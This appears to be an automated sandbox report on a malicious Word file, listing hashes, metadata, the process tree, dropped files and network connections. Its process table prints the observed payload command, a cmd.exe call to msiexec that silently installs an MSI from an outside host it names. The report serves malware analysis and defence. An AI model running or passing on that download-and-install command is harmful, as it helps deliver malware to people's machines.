Field | Value |
---|---|
File name | RemitScan001.docx |
Full analysis | https://app.any.run/tasks/2599ba9f-c0d2-458a-a518-1274f04e4126 |
Verdict | Malicious activity |
Analysis date | November 15, 2018, 08:26:59 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info | Microsoft Word 2007+ |
MD5 | 8F4CA353F1100C00124B3509DC90B9F1 |
SHA1 | 5F9134A3C66FA882A6DE0863A9618E6D559E255F |
SHA256 | E4919995928FC65C2B283E7EF2569C31BC71C1DA4D56662D1708403228FA5658 |
SSDEEP | 3072:k7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKEfdw:k7lCAdFkYhDFBxvqyRmTMSFmfSq |

Extension | Identified file type (score) |
---|---|
.docx | Word Microsoft Office Open XML Format document (52.2) |
.zip | Open Packaging Conventions container (38.8) |
.zip | ZIP compressed archive (8.8) |
Document property | Value |
---|---|
Description | - |
Creator | Windows User |
Subject | - |
Title | - |
ModifyDate | 2018:10:29 23:18:00Z |
CreateDate | 2018:10:29 23:18:00Z |
RevisionNumber | 2 |
LastModifiedBy | Richard |
Keywords | - |
AppVersion | 15 |
HyperlinksChanged | No |
SharedDoc | No |
CharactersWithSpaces | 1 |
LinksUpToDate | No |
Company | - |
TitlesOfParts | - |
HeadingPairs | |
ScaleCrop | No |
Paragraphs | 1 |
Lines | 1 |
DocSecurity | None |
Application | Microsoft Office Word |
Characters | 1 |
Words | - |
Pages | 1 |
TotalEditTime | 1 minute |
Template | template.dotx |
ZIP entry property | Value |
---|---|
ZipFileName | [Content_Types].xml |
ZipUncompressedSize | 1364 |
ZipCompressedSize | 351 |
ZipCRC | 0x2ea8411c |
ZipModifyDate | 1980:01:01 00:00:00 |
ZipCompression | Deflated |
ZipBitFlag | 0x0006 |
ZipRequiredVersion | 20 |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
3904 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\RemitScan001.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 |
840 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
3516 | cmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/shuipl.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1619; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2704 | msiexec.exe /i https://a.doko.moe/shuipl.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Exit code: 1619; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
2472 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
4032 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
2316 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\loanchanges.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAE2D.tmp.cvr | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{5B600270-0902-4FF1-AF5B-0DC8F1891341} | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{3717B99C-9174-4034-A98A-CECC372D3753} | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EE40392.jpeg | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{60305BDB-AA82-4EDA-9B2C-10C97B61B240}.tmp | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AFAC4FC4-F0AB-47E3-9AB1-9C1DA307B814}.tmp | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4B045517-C02D-4DF5-BEE5-EA3C384FBC8B}.tmp | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FA23CA01-16B8-41D1-B398-603BE726FFE3}.tmp | — | — | — |
2316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4F65.tmp.cvr | — | — | — |
3904 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70 | binary | DA6C793FB0533AF0139A6D76C9956547 | BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3904 | WINWORD.EXE | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
980 | svchost.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
2472 | msiexec.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe | | unknown |